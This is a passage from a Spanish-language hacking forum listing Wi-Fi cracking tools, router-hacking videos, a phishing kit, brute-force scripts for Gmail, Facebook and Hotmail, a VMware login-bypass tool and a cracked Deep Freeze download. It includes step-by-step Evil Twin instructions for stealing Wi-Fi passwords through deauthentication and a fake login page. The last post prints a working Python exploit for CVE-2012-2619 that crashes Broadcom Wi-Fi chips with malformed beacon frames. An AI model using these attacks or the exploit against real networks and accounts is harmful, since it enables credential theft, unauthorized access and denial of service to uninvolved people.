7.- Cracker Fern WiFi: es una aplicación de auditoría de seguridad inalámbrica que está escrito en Python y usa python-qt4. Esta aplicación utiliza la suite aircrack-ng de herramientas. No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

8.- WPSCrackGUI: es una interfaz gráfica para el crackeo de redes wireless con WPS.  No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

9.- Kismet: s un programa para Linux que permite detectar redes inalámbricas (WLANs) mediante la utilización de  tarjetas wireless en los estándar 802.11a, 802.11b y 802.11g No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

10.- Crack Online de WPA Y WPA2: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

11.- Aircrack-ng: una suite bastante completa y muy necesaria a la hora de auditar un AP No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Este Post se ira actualizando constantemente. cuyo fin sera de que los usuarios ya no estaran pasando un tedioso momento revisando post por post en busca de herramientas para el Hacking Wireless.

Un saludo!
#16

Que tal Underc0de, he estado muy inactivo en estos ultimos tiempos lo cual espero arreglarlo. pero bueno aca les he traido la wiki de la suit de aircrack-ng en Spanish, ya que en la pagina oficial de aircrack-ng aun esta en ingles.

Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos espero le saquen provecho. ya que aprendiendo bien utilizar esta herramienta serias capaz de poner a prueba cualquier AP.
#17
Seguridad Wireless / MACWatch 1.0 (Python NAC)
Marzo 27, 2013, 12:37:56 AM
Nadie puede negar que las redes Wifi han supuesto un avance en cuanto a conectividad, han permitido crear un ecosistema de aparatos interconectados de una forma muy fácil y cómoda.

No obstante, desde el punto de vista de la seguridad, las redes Wifi rompen los paradigmas de las redes conectadas por cable: ahora para acceder a tu red ya no hace falta estar físicamente frente a la toma de red.

Esto supone un reto a la hora de monitorizar la red y auditar quien y cuando se conecta a dicha red Wifi.

Mucha gente usa ARPWatch como herramienta para monitorizar su red Wifi, a mi, personalmente, no termina de convencerme, creo que tiene aspectos mejorables y por ello he creado mi propia versión con bastantes mejoras frente al original.

De entrada, MACWatch hace lo siguiente:

- Monitoriza nuevas direcciones MAC en la red

- Además de validar por MAC conocida / MAC desconocida, añade una comprobación basada en su perfil tcp/ip (puertos abiertos)

- Permite bloquear esa nueva dirección MAC (actúa como NAC)

- Envía un correo electrónico con las nuevas MACs detectadas

Respecto a monitorizar MACs, nada nuevo bajo el sol, se buscan MACs conocidas y MACs desconocidas. Donde empieza lo bueno es en la parte del perfil TCP/IP.

Lo que hace MACWatch es lanzar un escaneo vía Nmap contra la máquina y comprobar si tiene los puertos TCP abiertos que nosotros conocemos previamente

Esta comprobación añade seguridad frente a la comprobación de la MAC ya que es fácil conectarse a una red Wifi y 'clonar' la MAC de un cliente legítimo. Ahora, si alguien clona esa MAC pero el resultado de Nmap difiere, será bloqueada.

La parte del NAC funciona mediante envenenamiento ARP, esto ya lo hacen muchos sistemas NAC, lo que pasa es que algunos, desde mi punto de vista, lo hacen mal.

Envenenan la caché ARP del atacante, y eso me parece un poco ingenuo ya que un atacante podría fijar una entrada ARP estática y eludir el ataque.

MACWatch funciona de forma diferente: se definen una serie de hosts a proteger, típicamente el router, servidores que anden por la red, etc.

Cuando MACWatch detecte una MAC desconocida, procederá a aislarla de la red envenenando la caché ARP de los hosts protegidos, de esa forma el atacante no puede hacer -en teoría- nada para eludir el ataque.


Para configurarlo hay que editar dos ficheros:

macok.txt

En este fichero configuramos las direcciones MAC de nuestros equipos en la red y sus puertos abiertos.

La dirección MAC es fácilmente obtenible vía comando arp, los puertos abiertos se pueden sacar empleando nmap -sT -Pn contra el host que vayamos a defender.

Una vez hecho eso, el fichero queda tal que así

0f:71:20:f9:7c:4f<->22,23,110
a4:ba:49:c7:b6:ca<->600,900
6f:a8:f5:b4:70:55<->21

Como se puede ver, a la izquierda va la dirección MAC, luego un separador <-> y la lista de puertos abiertos separados por comas.

isolated.txt

En este fichero ponemos el listado de direcciones IPs de la red que queremos aislar del potencial atacante

192.168.33.1
192.168.33.55

Luego, hay que editar No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y definir:

- el correo electrónico origen de los mensajes, el correo destinatario y el servidor

- Si queremos que haga bloqueo de las nuevas MAC o no, recomiendo de inicio no hacerlo hasta tener todo funcionando. Para ello localizamos la variable

isolate = 0

Y la cambiamos a 1 si queremos bloqueo.

Finalmente ejecutamos tal que así (cambiando la red por la que toque):

python No tienes permitido ver enlaces. Registrate o Entra a tu cuenta 192.168.33.0/24

MACWatch genera un fichero de log llamado maclog.txt con información de los eventos.

Para descargar:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Requiere tener instalado python-nmap (disponible a través de pip)

De momento no deja de ser una versión inicial, pero sabiendo que por aquí nos visitan muchos 'Pythoneros', lanzo el guante: si os motiva la idea y queréis que vaya un poco más allá, escribidme un correo a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y podemos crear un proyecto en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta para evolucionarlo !

Y no solo gente que tire código, también sería genial tener un logo o mejor documentación

Fuente: SBD
#18
Seguridad Wireless / Hacking Routers (Videos)
Marzo 23, 2013, 09:09:50 PM

1.- Router Hacking Part 1 (The Basics) -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

2.- Router Hacking Part 2 (Service Enumeration, Fingerprinting And Default Accounts) -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

3.- Router Hacking Part 3 (Bruteforcing And Dictionary Attacks With Hydra) -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

4.- Router Hacking Part 4 (Snmp Attacks Using Snmpcheck) -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

5.- Router Hacking Part 5 (Snmp Attacks Using Snmpenum) -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

6.- Router Hacking Part 6 (Dictionary Attack Using Metasploit On Snmp) -> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Fuente: securitytube.
#19
FakeAP_Pwn es un Script que automatiza un ataque dirigido a clientes Wi-Fi.


Video: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Password: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos.
#20
BrowserScan es un servicio que permite escanear el navegador en busca de complementos vulnerables. El análisis se realiza de forma instantánea verificando las versiones instaladas de Java, Flash, Adobe Reader, Adobe Shockwave, Quicktime, RealPlayer, Silverlight, VLC Media Player, Windows Media Player y Phoscode DevalVR.

La herramienta fue creada por el equipo de Rapid7, los mismos creadores de Metasploit y es completamente gratuita:


Además de realizar escaneos manuales del navegador, la herramienta puede trabajar de forma automática bajo un sistema de estadísticas muy bueno que puede ser utilizado en entornos empresariales para hacer un seguimiento o evaluar la seguridad de los empleados.

Simplemente hay que crearse una cuenta en BrowserScan, luego es necesario agregar un pequeño script (tracking code) en alguna página muy visitada por los usuarios o la intranet de la empresa, de esta forma se podrán analizar automáticamente los navegadores de todos los visitantes (sin exploraciones manuales o instalaciones extras).

Cabe mencionar que la información se recopila de forma general, es decir no se realiza un seguimiento personalizado de cada usuario o computadora. Además, el script puede funcionar de forma transparente (invisible) o desplegar una advertencia a los usuarios en caso de que el navegador sea vulnerable.


Web Site: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Fuente: SpamLoco
#21

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Aparte de confirmar si un correo electrónico existe o no, te da información del mismo.

Fuente: Paper "Gmail Hacking" - RAJ CHANDEL

#22
¿Que es BeEf?

BeEF es una aplicación orientada a los Test de Penetración desarrollada por el equipo de Bindshell. Su funcionalidad principal es la de recolectar zombies, para después poder lanzarles distintos ataques a través de scripts.







Web: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Autor de los Videostutoriales: Alexander Vargas
#23

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#24

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Password: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos.
#25
Tema: Utilizando Airlin (WifiSlax V. 4.3)


¿Que es Airlin?                   

Airlin es un recuperador de contraseñas WPA y WPA2, su funcionamiento se basa en testear un diccionario para despues identificar el password correcto de la Red Inalámbrica elegida.


Comentario: Bueno Airlin me parece una herramienta para realizar Fuerza Bruta de forma directa (BruteForce), algo lenta en el proceso y es ahí donde encuentro una desatisfaccion y es que en el momento que la interfaz pide el numero de tiempo que puede demorarse en testear un password y otro, si colocas 1 ó 2 ó 3  (con los que he testeado) te da falsos positivos, me imagino que esto se deberá a que debe de respetarse un cierto tiempo para que se pueda intentar probando y lógicamente dependera a la marca y calidad del router con la cual estamos practicando.

Autor: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos.

PD: me anime a realizar este comentario para que aquellas personas que van a testear a Airlin, sepan deducir algunos problemas que se les presenten.
#26
Seguridad Wireless / Ataque Evil Twin Attack
Diciembre 27, 2012, 09:54:04 PM
Bueno chicos les dejo este video en el que se ejecuta y enseña a como realizar el Ataque Evil Twin Attack, no es de mi Autoria si no de Technic Dynamic:


El ataque tiene los siguientes requerimientos:

1. Creas una pagina web, en php o html, que simule un formulario para meter contraseña, como en el del video.
2. Creas una DB o un script para que los datos que se metan en esa web se guarden en algun sitio.
3. Haces que tu tarjeta wireless tenga la misma MAC y BSSID (nombre) que el router a atacar.
4. Haces que tu tarjeta wireless se convierta en un AP usando airbase-ng
5. Instalas un servidor DHCP, que es lo que da las IP's a los clientes que se conecten a tu AP simulado.
6. Modificas iptables para que TODAS las conexiones que realize el cliente que se ha conectado a ti les redireccione a la pagina web de 1.
7. Miras si el AP que has clonado tiene clientes. En cuanto veas que tiene uno, haces un DEAUTH (aireplay -0) para que se desconecte. Esto hara que su tonto pobre ordenador pruebe a reconectar con el mismo supuesto router (MAC + BSSID), casualmente tu has clonado MAC Y BSSID del router original asique el CLIENTE SE CONECTA A TI.
8. En cuanto el cliente abra internet, les saldra la pagina de 1. En cuanto meta los datos y compruebes que estan en la DB o sitio donde los guardes, desmontas el chiringuito.

Comentario personal: uno de los mejores ataques, ¿mejor por que? por que no hay que que Crakear nada (lo cual es una perdida de tiempo).

Saludos  8)
PD. publicare un vídeo realizando este ataque pero en Spanish.
Saludos.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#27
La presentación (DesConferencia) hace un recorrido por las diferentes definiciones y términos relacionados con el Análisis Forense Digital dirigido a Dispositivos Móviles (en específico Smartphones), los datos que podemos extraer, los diferentes lugares en los cuales podemos ubicar la información, algunas reglas y metodologías a tener siempre presentes antes y durante el procedimiento, así como una prueba de concepto de un análisis automatizado a un dispositivo BlackBerry Smartphone.

Presentacion: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos.
Fuente: Sec-Track
#28
Hacking / Brute Force V.1 (TEU)
Diciembre 12, 2012, 03:46:27 PM



Herramientas:

- Scripts de F.Bruta: Gmail, Facebook y Hotmail.

- Programas:
                Advanced Office Password Recovery Professional 5.02
                elcomsoft wireless security auditor V50.25

Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Password: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos: By Aryenal
#29
Softwares e ISOs / Fuck deep freeze V.7
Diciembre 11, 2012, 03:25:50 PM

Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
PassworD: CKcwBe2egS22A7GG (Encrypt -> GILA7)
Saludos. 8)
#30
Descripción: a travez de la herramienta Multiattack que trae la distribucion WifiWay V3.4, en resumen lo que realiza es detetar que redes tienen contraseñas por defecto para posteriormente, mostrarlas.


Video:

Autor del video: roqueraultenerife
#31

Descripción:

Escrito en formato Guía del principiante Packt, usted puede fácilmente comprender los conceptos y comprender las técnicas para llevar a cabo ataques inalámbricos en su laboratorio. Cada nuevo ataque se describe en la forma de un ejercicio de laboratorio con ricas ilustraciones de todos los pasos asociados. Prácticamente se llevará a cabo varios ataques a medida que avanza. Si usted es un profesional de la seguridad de TI o consultor de seguridad que quiere empezar con pruebas inalámbricas con Backtrack, o simplemente curiosos acerca de la seguridad inalámbrica y la piratería, entonces este libro es para usted. El libro se supone que tiene familiaridad con Backtrack y conceptos básicos inalámbricos.

Descarga:

- Libro original (Ingles) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- Libro Traducido (Español) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Mas Informacion: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Creditos: Hist
#32
Programa generador de diccionarios, Textualmente como dice el autor se trata de un generador de diccionarios que vá bastante rápido, este tarda sobre 2 minutos para generar un diccionario de 8 caracteres numérico (100 millones de claves, aprox. 900 MB). Tambien incluye generador para las WLAN_XX, WLAN_XXXX, JAZZTEL_XX y JAZZTEL_XXXX.


Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#33

Resumen: VMInjector es una herramienta diseñada para evitar utilizar las pantallas de inicio de sesión de autenticación de los sistemas operativos más importantes que se ejecutan en VMware Workstation / Player, mediante el uso de memoria manipulación directa.

Descripción:
VMInjector es una herramienta que manipula la memoria de los clientes de VMware con el fin de eludir el sistema de operación de la pantalla de autenticación.

VMware maneja los recursos asignados a los sistemas operativos invitados, incluyendo la memoria RAM. VMInjector inyecta una biblioteca DLL en el proceso de VMWare para obtener acceso a los recursos asignados. La biblioteca DLL trabaja por espacio de memoria en el análisis de propiedad del proceso de VMware y localizar el archivo asignado en memoria RAM, lo que corresponde a la imagen de la memoria RAM del huésped. Mediante la manipulación del fichero RAM asignada y la función de aplicación de parches a cargo de la autenticación, un atacante obtiene acceso no autorizado a la máquina virtual subyacente.

VMInjector actualmente pueden pasar por alto bloqueado Windows, Ubuntu y Mac OS X sistemas operativos.

La aplicación de parches en la memoria no es persistente, y reiniciar la máquina virtual invitada a restaurar la funcionalidad de contraseña normal.

Atacar Escenarios:
VMInjector se puede usar si la contraseña de un host virtual se olvida y requiere reajuste.

Más generalmente, esta herramienta puede ser utilizada durante las actividades de pruebas de penetración, cuando el acceso a un host de VMware se logra y el atacante está tratando de obtener acceso adicional a los invitados que se ejecutan en el host, por ejemplo.

Requisitos:
Máquina Windows (con acceso administrativo);
VMware workstation o edición jugador;
Un invitado bloqueado VM;

Uso:
VMInjector consta de 2 partes:
La aplicación de inyección DLL (script python o suministrado ejecutable convertido)
DLL de la biblioteca (x86 y x64)
La herramienta es compatible con las arquitecturas x86 bits y x64, proporcionando ambos archivos DLL. Uno puede utilizar su propio inyector DLL para seleccionar la máquina virtual invitada en ejecución en el host.
Con el fin de ejecutar la herramienta, ejecute el VMInjector (32 o 64) ejecutable proporcionado desde la línea de comandos tal como se muestra en la figura 1.


Figura 1: Lista de ejecutar máquinas clientes corriendo.

VMWare ejecuta cada huésped en un proceso diferente. VMInjector hay que señalar que el proceso que se ejecuta el cliente que requiere bypass. Una vez que el usuario elige un proceso, se inyecta la DLL en el destino elegido.
Una vez que el DLL se inyecta, el usuario tendrá que especificar el sistema operativo, de manera que la aplicación de parches memoria se puede lograr, como se muestra en la Figura 2.

Figura 2: En busca de la firma OS en la memoria y parches.

Web Site: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#34
Seguridad Wireless / SWifi Keygen V. 1.0.0.2
Noviembre 30, 2012, 06:56:04 PM
¿Que es Swifi Keygen?

Es una herramienta orientada a la auditoria de redes inalambricas. Genera diccionarios para poder auditar las redes con patrones conocidos.


Descargar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#35
Descripción: En este documento explicare cómo es posible saltarse la conocida pregunta de seguridad que Hotmail o gMail realiza al detectar que una cuenta de correo electrónico es accesada desde una ubicación totalmente diferente a la cotidiana.


Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Autor: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos.
#36
Hacking / SPToolKit (Kit de herramientas para Phishing)
Noviembre 24, 2012, 07:17:02 PM
SPTool Kit es un completo conjunto de herramientas de auto-contenido de phishing de correo electrónico que se puede instalar y configurar en menos de 15 minutos y permite sensibilizar al "eslabón más débil" sobre los peligros de este tipo de ataques y los efectos negativos que pueden causar en las compañías.

Para la instalación debe tener servicios como apache, php, mysql, donde pueda subir la herramienta de forma sencilla y dirigida para su instalación.


Como configurarlo:

Para la instalación debe tener servicios como apache, php, mysql, donde pueda subir la herramienta de forma sencilla y dirigida para su instalación. A continuación les muestro algunos pasos de instalación y el frame donde están las opciones para realizar las pruebas.

1.- Se debe lanzar el paquete y mostrara los primeros pasos para la instalación:


2.- Se aceptan los términos de instalación y herramientas (bajo su responsabilidad):


3.- Posterior a ello se debe hacer algunas comprobaciones antes de empezar y ajustarlas si no están bien configuradas:


4.- Posterior a la corrección permitirá la configuracion la base de datos y el las credenciales de administración:


5.- Para finalmente tener acceso al panel de administración que le permitirá realizar Phishing de forma sencilla en la compañía y medir gráficamente su comportamiento:

Link: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#37
Hacking / Metasploit Framework Tutorial - Video [Español]
Noviembre 19, 2012, 11:23:45 AM
Hola,
Amigos Hoy les traigo un Buenisimo Tutorial que esta llevando acabo un Amigo
llamado Alexander Vargas (duvanalex3029) Basado en el Completo Tutorial Metasploit Unleashd. Seguire poniendo los Videos segun vallan saliendo Saludos y Comenten.

Aqui Esta su Canal  en youtube Suscribete Porfavor No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Metasploit Framework Tutorial || Español || Introducción || Cap.1

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Metasploit Framework Tutorial || Preparandonos|| Cap.2 ||Parte 1/3

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Metasploit Framework Tutorial || Preparandonos|| Cap.2 ||Parte 2/3

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Metasploit Framework Tutorial || Preparandonos|| Cap.2 ||Parte 3/3

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#38
Ajay Singh Negi ha descubierto un problema de seguridad en Joomla! que podría permitir a un atacante eludir restricciones de seguridad y ataques de cross-site request forgery (CSRF) a través de la técnica del "clickjacking".

¿Qué es el Clickjacking? El término clickjacking fue acuñado por Jeremiah Grossman y Robert Hansen en 2008 (ya hablamos de el aquí en Hackplayers). También conocido como UI redressing, se resume en lo siguiente: un usuario hace clic sobre un enlace o botón que está viendo y en realidad lo hace sobre otro enlace controlado por terceros. El clickjacking puede ser entendido como una variante del problema de reemplazo confuso y para referirse a cualquier tipo de técnica que implique el que un usuario interaccione con una web creyendo que en realidad lo está haciendo con otra.
 
CSRF es una técnica que permitiría realizar peticiones HTTP sin una correcta validación. Por ejemplo, imaginemos que un usuario se encuentra validado en una página que necesita autenticación. Desde el navegador, visita otra web que esconde una petición HTTP hacia esa página que necesita validación. Esa petición HTTP, en forma de enlace, se carga por la víctima sin saberlo y realiza una acción sobre la página en la que se encuentra autenticada. Esto sería un fallo de CSRF por parte de la página que necesita autenticación  puesto que no valida correctamente que las peticiones provengan de su propio dominio. Para impedir ésto, las páginas suelen introducir un sistema de control que impide que una petición desde otra web sea válida. A su vez, para eludirlo, los atacantes utilizan técnicas como clickjacking (un término acuñado en 2008), que permite realizar ataques CSRF aunque se hayan implementado ciertas técnicas para evitarlo.

El problema es que Joomla! permite a cualquier usuario realizar acciones a través de peticiones HTTP que no son convenientemente validadas. Si un usuario visita un enlace especialmente manipulado hacia una plataforma Joomla!, se podrían realizar acciones sobre el portal y el atacante podría así eludir restricciones de seguridad. No se han dado más detalles sobre la vulnerabilidad, pero probablemente permitiría que un usuario suplantase a otro sin necesidad de conocer la contraseña.

Este fallo se da en las versiones 2.5.7 y anteriores. Se ha solucionado en la versión 2.5.8 disponible desde No tienes permitido ver enlaces. Registrate o Entra a tu cuenta:


Como siempre tratamos en no quedarnos en la mera información y pasamos a una rica prueba de concepto:

eboila!! nos hemos bypasseado el admin de joomla.

Fuente: hackplayers
#39
Hacking / Search email collector (MSF)
Noviembre 16, 2012, 12:47:46 PM
Este módulo utiliza los motores de busquedad Google, Bing y Yahoo para crear una lista de direcciones de correo electrónico válidas para el dominio de destino.

Abrimos una terminal y ejecutamos "msfconsole"


¿Como usarlo?

1.- set DOMAIN No tienes permitido ver enlaces. Registrate o Entra a tu cuenta -> elegimos el dominio
2.- set OUTFILE resultados.txt -> especificamos el fichero en donde nos volcara las cuentas de correos electronicos encontrados.
3.- exploit -> lanzamos el modulo

Saludos, espero haya servido un poco, por otro lado si desean testear otra herramienta parecida puede ser theharvester.
#40

Estaba en mi casa tranquilamente decidiendo sobre el tema de una nueva entrada para hackplayers, cuando de pronto me llegó el siguiente email que os lo dejo integro tal y como lo recibí. Jejeje así me ahorro unos cuantos caracteres y me sirve de intro, que ando algo malito por el cambio estacional:

"Se ha publicado una vulnerabilidad presente en determinados Chipset de la firma Broadcom, en especial los modelos BCM4325/29 integrados en multitud de dispositivos inalámbricos como smartphones, tablets e incluso vehículos (como el Ford Edge).

El fallo permitiría realizar una denegación de servicio al módulo inalámbrico e incluso la revelación de información sensible según los propios investigadores. El fallo podría reproducirse atacando directamente al módulo WiFi independientemente del sistema operativo presente en el dispositivo. 

La vulnerabilidad (CVE-2012-2619) reportada por el laboratorio de CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, el cual que hizo una demostración pública durante la pasada Ekoparty en Buenos Aires, Argentina. Su compañero Matias Eissler desarrolló la prueba de concepto totalmente funcional.

Mediante estudios de ingeniería inversa consiguieron comprender la estructura del firmware de los dispositivos Broadcom, hallando la forma de alterar el tráfico WiFi (normativa IEEE 802.11) de tal manera que afectara a dichos dispositivos inalámbricos a través del envío de tramas RSN (IEEE 802.11i, WPA/WPA2) especialmente manipuladas.

El protocolo RSN (Robust Security Network) interviene en la negociación y establecimiento del tipo de autenticación y cifrado utilizado durante una sesión WPA/WPA2. 

En coordinación con los investigadores y el US-CERT, Broadcom facilitó 
a los diferentes fabricantes (Apple, HTC, Motorola, Sony, Nokia, Samsung...) un nuevo firmware que impide la vulnerabilidad para integrarlo en sus dispositivos, "por lo que se da como subsanada" XDD.

Los dispositivos afectados con el chipset BCM4325: 
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge
Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad"
Bueno una vez vista la noticia, gracias a los chicos de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta vamos a ver de que va un poco todo esto:

A la noticia le acompañaba el siguiente script de python, el cual en principio tiene un par de erratas que supongo pusieron a propósito ;D. Así que editamos el código en nuestro editor preferido y corregimos:

*Poned especial atencion en los campos que he coloreado.
Enlace al codigo: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Código: text
---------------------------------------------------------------------------------------------
#!/usr/bin/env python

import sys
import time
import struct
import PyLorcon2

def beaconFrameGenerator():
    sequence = 0
    while(1):
        sequence = sequence % 4096

        # Frame Control
        frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
        frame += '\x00' # Flags: 0
        frame += '\x00\x00' # Duration: 0
        frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
        frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
        frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
#part of the generator
        # Frame Body
        frame += struct.pack('Q', time.time()) # Timestamp
        frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
        frame += '\x11\x04' # Capability Information: ESS, Privacy,
#Short Slot time
        # Information Elements
        # SSID: buggy
        frame += '\x00\x05buggy'
        # Supported Rates: 1,2,5.5,11,18,24,36,54
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
        # DS Parameter Set: 6
        frame += '\x03\x01\x06'
        # RSN IE
        frame += '\x30' # ID: 48
        frame += '\x14' # Size: 20
        frame += '\x01\x00' # Version: 1
        frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
        frame += '\x01\x00' # Pairwise cipher suite count: 1
        frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
        frame += '\xff\xff' # Authentication suites count: 65535
        frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
        frame += '\x00\x00'

        sequence += 1
        yield frame

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage:"
        print "\t%s <wireless interface>" % sys.argv[0]
        sys.exit(-1)

    iface = sys.argv[1]
    context = PyLorcon2.Context(iface)
    context.open_injmon()

    generator = beaconFrameGenerator()

    for i in range(10000):
        frame = generator.next()
        time.sleep(0.100)
        context.send_bytes(frame)

---------------------------------------------------------------------------------


Cerramos nuestro editor guardando el archivo como No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.

Para llevar a cabo la prueba de concepto, que el script sea funcional y echándole un ojo al código, nos damos cuenta que necesitamos tener instalado PyLorcon2

Procederemos a bajarlo directamente desde la consola:

Código: text
svn co http://802.11ninja.net/svn/lorcon/tags/lorcon2-200911-rc1/ lorcon2-200911-rc1


Instalamos el software necesario para construir lorcon2 and pylorcon2.

Código: text
sudo apt-get install libpcap-dev libnl-dev python-dev


procederemos a compilar lordcom2:

Código: text
$ cd lorcon2-200911-rc1
$ ./configure --libdir=/usr/lib...
$ make...
$ sudo make install...


El próximo paso será bajarnos e instalar pylorcom2:

Código: text
$ svn co http://pylorcon2.googlecode.com/svn/trunk pylorcon2
...
$ cd pylorcon2...
$ python setup.py build...
$ python setup.py install...


ahora testeamos el funcionamiento:


y procedemos a la prueba de concepto:


En seguida veremos a nuestra tarjeta de red "echa mistos":


y voilá!!! Cualquier dispositivo wifi con los chipset anteriormente mencionados caerá fulminado  ..a 30 mts a la redonda... con tan sólo realizar un escaneo de redes...

Sed buenos :D

Fuentes:
                 No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
                 No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
                 No tienes permitido ver enlaces. Registrate o Entra a tu cuenta